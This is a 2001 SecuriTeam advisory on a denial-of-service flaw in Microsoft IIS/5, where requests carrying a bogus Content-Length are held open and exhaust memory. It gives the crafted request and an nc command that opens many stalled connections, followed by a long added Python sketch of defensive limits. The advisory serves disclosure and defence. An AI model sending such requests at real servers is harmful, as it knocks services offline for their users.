[NT] Microsoft IIS/5 Bogus Content-Length Memory Bug
From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 12 Dec 2001 23:20:23 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft IIS/5 Bogus Content-Length Memory Bug
------------------------------------------------------------------------
SUMMARY
A security flaw exists in the way IIS handles mislabeled Content-Length
requests (requests carrying an HTTP Content-Length header without a body of
that length). The flaw can cause the server to consume a massive amount of
memory, which can lead to a denial of service.
DETAILS
The behaviour by itself is not a security flaw, but with some tweaking it
can lead to a denial of service. When you send a bad request to a Microsoft
IIS/5.0 server, it returns an error and closes the connection, as it does
when authentication fails.
Example (1):
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
 application/vnd.ms-excel, application/vnd.ms-powerpoint,
 application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic
Now add a "Content-Length: 5300643" header to the same request.
When you send this request to the server, it hangs waiting for something
to happen and never closes the connection.
Example (2):
$ cat <<'EOF' >bogus.txt
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
 application/vnd.ms-excel, application/vnd.ms-powerpoint,
 application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic
EOF
$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
PID PPID PGID WINPID TTY UID STIME COMMAND
696 1 696 696 con 500 12:22:37 /usr/bin/bash
2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc
2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps
$ netstat -an |grep 192.168.0.10
TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED
Now you have an open connection that is waiting on the server. You can open
as many as you want: the server never closes the connections and you will
never see a timeout. With around 4322 connections opened in this way, the
Windows server's memory consumption jumps from roughly 404 MB to 920 MB.
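As an added, defender-side illustration (not part of the advisory and not IIS code), the following Python sketch shows the two server-side controls that neutralise this pattern: an upper bound on the declared Content-Length, enforced before any body memory is reserved, and a read deadline on the body so that a client which declares a body and then goes silent gets a 408 instead of holding the worker open indefinitely. The policy values (MAX_HEAD, MAX_BODY, BODY_TIMEOUT), the function names and the local socketpair harness are assumptions made for the example; the constructed request reuses the advisory's Content-Length of 5300643.

```python
import socket

# Policy limits used by this example (assumed values, not IIS settings).
MAX_HEAD = 8 * 1024       # most bytes of request head we will buffer
MAX_BODY = 1024 * 1024    # largest Content-Length we will honour
BODY_TIMEOUT = 0.5        # seconds a client may stall before we give up

# Constructed request modelled on the advisory: a declared body of
# 5300643 bytes that the client never sends.
BOGUS_REQUEST = (
    b"GET /testfile HTTP/1.1\r\n"
    b"Host: 192.168.0.10\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Length: 5300643\r\n"
    b"Authorization: Basic\r\n"
    b"\r\n"
)


def parse_head(head):
    """Return {lower-case name: [values]} for a complete request head.
    Raises ValueError on a malformed request line or header line."""
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError("bad request line")
    headers = {}
    for line in lines[1:]:
        if not line:
            break                       # blank line ends the head
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError("bad header line")
        key = name.strip().lower().decode("latin-1")
        headers.setdefault(key, []).append(value.strip().decode("latin-1"))
    return headers


def check_content_length(headers, max_body=MAX_BODY):
    """Decide before reading any body byte. Returns (status, body_len):
    200 = read body_len bytes, 400 = malformed, 413 = exceeds policy."""
    values = headers.get("content-length", [])
    if not values:
        return 200, 0
    if len(set(values)) != 1 or not values[0].isdigit():
        return 400, 0                   # conflicting or non-numeric values
    length = int(values[0])
    if length > max_body:
        return 413, length              # refuse without reserving memory
    return 200, length


def read_body(conn, length, prefix=b"", timeout=BODY_TIMEOUT):
    """Read exactly `length` body bytes in bounded chunks (never a single
    allocation of the declared size). A stall longer than `timeout` yields
    408, so a client that never sends its body cannot pin the worker."""
    conn.settimeout(timeout)
    chunks = [prefix[:length]]
    got = len(chunks[0])
    try:
        while got < length:
            chunk = conn.recv(min(65536, length - got))
            if not chunk:
                return 400, b""         # client closed mid-body
            chunks.append(chunk)
            got += len(chunk)
    except socket.timeout:
        return 408, b""
    return 200, b"".join(chunks)


def handle_connection(conn, max_body=MAX_BODY, timeout=BODY_TIMEOUT):
    """Serve one request on `conn` and return the status we would send."""
    conn.settimeout(timeout)
    head = b""
    try:
        while b"\r\n\r\n" not in head and b"\n\n" not in head:
            if len(head) >= MAX_HEAD:
                return 431              # request head too large
            chunk = conn.recv(4096)
            if not chunk:
                return 400              # closed before the head was complete
            head += chunk
    except socket.timeout:
        return 408                      # head never finished arriving
    try:
        headers = parse_head(head)
    except ValueError:
        return 400
    status, length = check_content_length(headers, max_body)
    if status != 200:
        return status
    sep = b"\r\n\r\n" if b"\r\n\r\n" in head else b"\n\n"
    body_start = head.split(sep, 1)[1]  # body bytes already buffered, if any
    status, _body = read_body(conn, length, body_start, timeout)
    return status


def simulate(request, max_body=MAX_BODY, timeout=BODY_TIMEOUT):
    """Feed `request` through a local socketpair: the client sends the bytes
    and then goes silent, like the nc session in the advisory."""
    client, server = socket.socketpair()
    try:
        client.sendall(request)
        return handle_connection(server, max_body, timeout)
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    print("bogus request, 1 MiB policy:", simulate(BOGUS_REQUEST))                  # 413
    print("bogus request, policy raised:", simulate(BOGUS_REQUEST, max_body=10**7))  # 408
    print("well-formed POST:", simulate(
        b"POST / HTTP/1.1\r\nHost: h\r\nContent-Length: 5\r\n\r\nhello"))           # 200
```

The two knobs map directly onto the advisory's symptoms: the size cap answers "massive amount of memory" by refusing oversized declarations before anything is allocated, and the read deadline answers "never see a timeout" by bounding how long a silent client can keep a connection and its buffers alive. Either control alone leaves a gap, since a small declared length still ties up a worker without the deadline, and a deadline alone still lets a large declaration reserve memory on servers that preallocate the body buffer.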
ADDITIONAL INFORMATION
The information has been provided by
<mailto:ivan.hernandez@globalsis.com.ar> Ivan Hernandez Puga.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.